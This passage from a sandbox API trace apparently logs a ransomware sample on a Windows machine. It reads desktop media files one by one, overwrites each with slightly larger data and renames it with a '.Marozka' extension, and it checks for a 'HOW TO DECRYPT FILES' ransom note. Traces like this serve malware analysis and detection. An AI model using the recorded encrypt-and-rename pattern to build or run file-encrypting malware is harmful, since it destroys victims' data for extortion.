ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x13850)) returned 1 [0044.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.848] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a1_kt9vz.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\a1_kt9vz.jpg.marozka")) returned 1 [0044.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", lpFilePart=0x0) returned 0x27 [0044.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.849] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ct2bkpd6cfi.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.849] GetFileType (hFile=0x2e0) returned 0x1 [0044.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.849] GetFileType (hFile=0x2e0) returned 0x1 [0044.849] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x9e37 [0044.849] ReadFile (in: hFile=0x2e0, lpBuffer=0x27cd7ac, nNumberOfBytesToRead=0x9e37, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27cd7ac*, lpNumberOfBytesRead=0x5beabc*=0x9e37, lpOverlapped=0x0) returned 1 [0044.849] CloseHandle (hObject=0x2e0) returned 1 [0044.889] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.889] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.890] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", lpFilePart=0x0) returned 0x27 [0044.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.890] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ct2bkpd6cfi.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.891] GetFileType (hFile=0x2e0) returned 0x1 [0044.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.891] GetFileType (hFile=0x2e0) returned 0x1 [0044.891] WriteFile (in: hFile=0x2e0, lpBuffer=0x284bcd8*, nNumberOfBytesToWrite=0x9e40, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x284bcd8*, lpNumberOfBytesWritten=0x5beab0*=0x9e40, lpOverlapped=0x0) returned 1 [0044.893] CloseHandle (hObject=0x2e0) returned 1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3", lpFilePart=0x0) returned 0x27 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3.Marozka", lpFilePart=0x0) returned 0x2f [0044.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ct2bkpd6cfi.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e0eda0, ftCreationTime.dwHighDateTime=0x1d4d597, ftLastAccessTime.dwLowDateTime=0x97350550, ftLastAccessTime.dwHighDateTime=0x1d4cc63, ftLastWriteTime.dwLowDateTime=0xdd7d040c, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9e40)) returned 1 [0044.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.898] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ct2bkpd6cfi.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cT2BKpd6CFI.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\ct2bkpd6cfi.mp3.marozka")) returned 1 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", lpFilePart=0x0) returned 0x26 [0044.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\epzzp_2ix8.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.899] GetFileType (hFile=0x2e0) returned 0x1 [0044.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.899] GetFileType (hFile=0x2e0) returned 0x1 [0044.900] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1733e [0044.901] ReadFile (in: hFile=0x2e0, lpBuffer=0x3741378, nNumberOfBytesToRead=0x1733e, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x3741378*, lpNumberOfBytesRead=0x5beabc*=0x1733e, lpOverlapped=0x0) returned 1 [0044.902] CloseHandle (hObject=0x2e0) returned 1 [0044.943] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.943] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.943] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", lpFilePart=0x0) returned 0x26 [0044.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.943] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\epzzp_2ix8.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.945] GetFileType (hFile=0x2e0) returned 0x1 [0044.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.945] GetFileType (hFile=0x2e0) returned 0x1 [0044.945] WriteFile (in: hFile=0x2e0, lpBuffer=0x37b53f8*, nNumberOfBytesToWrite=0x17340, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x37b53f8*, lpNumberOfBytesWritten=0x5beab0*=0x17340, lpOverlapped=0x0) returned 1 [0044.952] CloseHandle (hObject=0x2e0) returned 1 [0044.955] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3", lpFilePart=0x0) returned 0x26 [0044.955] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3.Marozka", lpFilePart=0x0) returned 0x2e [0044.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.955] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\epzzp_2ix8.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f84ba0, ftCreationTime.dwHighDateTime=0x1d4d5f3, ftLastAccessTime.dwLowDateTime=0x44e25350, ftLastAccessTime.dwHighDateTime=0x1d4d1a1, ftLastWriteTime.dwLowDateTime=0xdd866b75, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17340)) returned 1 [0044.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.955] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\epzzp_2ix8.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\EPzZp_2ix8.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\epzzp_2ix8.mp3.marozka")) returned 1 [0044.956] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", lpFilePart=0x0) returned 0x22 [0044.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\gqadin.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.956] GetFileType (hFile=0x2e0) returned 0x1 [0044.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.956] GetFileType (hFile=0x2e0) returned 0x1 [0044.956] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xc3d [0044.960] ReadFile (in: hFile=0x2e0, lpBuffer=0x28a3ebc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x28a3ebc*, lpNumberOfBytesRead=0x5beabc*=0xc3d, lpOverlapped=0x0) returned 1 [0044.960] CloseHandle (hObject=0x2e0) returned 1 [0044.993] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.995] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", lpFilePart=0x0) returned 0x22 [0044.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\gqadin.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.996] GetFileType (hFile=0x2e0) returned 0x1 [0044.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.996] GetFileType (hFile=0x2e0) returned 0x1 [0044.996] WriteFile (in: hFile=0x2e0, lpBuffer=0x28f5c40*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x28f5c40*, lpNumberOfBytesWritten=0x5bea84*=0xc40, lpOverlapped=0x0) returned 1 [0044.997] CloseHandle (hObject=0x2e0) returned 1 [0045.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4", lpFilePart=0x0) returned 0x22 [0045.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4.Marozka", lpFilePart=0x0) returned 0x2a [0045.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\gqadin.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209e98f0, ftCreationTime.dwHighDateTime=0x1d4ce4f, ftLastAccessTime.dwLowDateTime=0x78020170, ftLastAccessTime.dwHighDateTime=0x1d4d077, ftLastWriteTime.dwLowDateTime=0xdd8d9291, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0045.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.003] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\gqadin.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\GQADin.mp4.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\gqadin.mp4.marozka")) returned 1 [0045.003] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", lpFilePart=0x0) returned 0x25 [0045.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.004] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lak-gh4cx.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.004] GetFileType (hFile=0x2e0) returned 0x1 [0045.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.004] GetFileType (hFile=0x2e0) returned 0x1 [0045.004] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xa94f [0045.005] ReadFile (in: hFile=0x2e0, lpBuffer=0x28f6e74, nNumberOfBytesToRead=0xa94f, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x28f6e74*, lpNumberOfBytesRead=0x5beabc*=0xa94f, lpOverlapped=0x0) returned 1 [0045.005] CloseHandle (hObject=0x2e0) returned 1 [0045.045] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.045] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", lpFilePart=0x0) returned 0x25 [0045.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.045] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lak-gh4cx.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.047] GetFileType (hFile=0x2e0) returned 0x1 [0045.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.047] GetFileType (hFile=0x2e0) returned 0x1 [0045.047] WriteFile (in: hFile=0x2e0, lpBuffer=0x2963864*, nNumberOfBytesToWrite=0xa950, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2963864*, lpNumberOfBytesWritten=0x5beab0*=0xa950, lpOverlapped=0x0) returned 1 [0045.049] CloseHandle (hObject=0x2e0) returned 1 [0045.054] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi", lpFilePart=0x0) returned 0x25 [0045.054] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi.Marozka", lpFilePart=0x0) returned 0x2d [0045.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lak-gh4cx.avi"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8221d0, ftCreationTime.dwHighDateTime=0x1d4d21c, ftLastAccessTime.dwLowDateTime=0x679ea0, ftLastAccessTime.dwHighDateTime=0x1d4d38c, ftLastWriteTime.dwLowDateTime=0xdd94c0ac, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xa950)) returned 1 [0045.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.054] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lak-gh4cx.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Lak-gH4cX.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\lak-gh4cx.avi.marozka")) returned 1 [0045.055] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", lpFilePart=0x0) returned 0x22 [0045.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lcfiri.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.055] GetFileType (hFile=0x2e0) returned 0x1 [0045.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.055] GetFileType (hFile=0x2e0) returned 0x1 [0045.055] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xa0b2 [0045.103] ReadFile (in: hFile=0x2e0, lpBuffer=0x296e628, nNumberOfBytesToRead=0xa0b2, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x296e628*, lpNumberOfBytesRead=0x5beabc*=0xa0b2, lpOverlapped=0x0) returned 1 [0045.103] CloseHandle (hObject=0x2e0) returned 1 [0045.145] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.145] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", lpFilePart=0x0) returned 0x22 [0045.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lcfiri.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.147] GetFileType (hFile=0x2e0) returned 0x1 [0045.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.147] GetFileType (hFile=0x2e0) returned 0x1 [0045.147] WriteFile (in: hFile=0x2e0, lpBuffer=0x29ed7d4*, nNumberOfBytesToWrite=0xa0c0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x29ed7d4*, lpNumberOfBytesWritten=0x5beab0*=0xa0c0, lpOverlapped=0x0) returned 1 [0045.148] CloseHandle (hObject=0x2e0) returned 1 [0045.151] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp", lpFilePart=0x0) returned 0x22 [0045.151] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp.Marozka", lpFilePart=0x0) returned 0x2a [0045.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lcfiri.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, 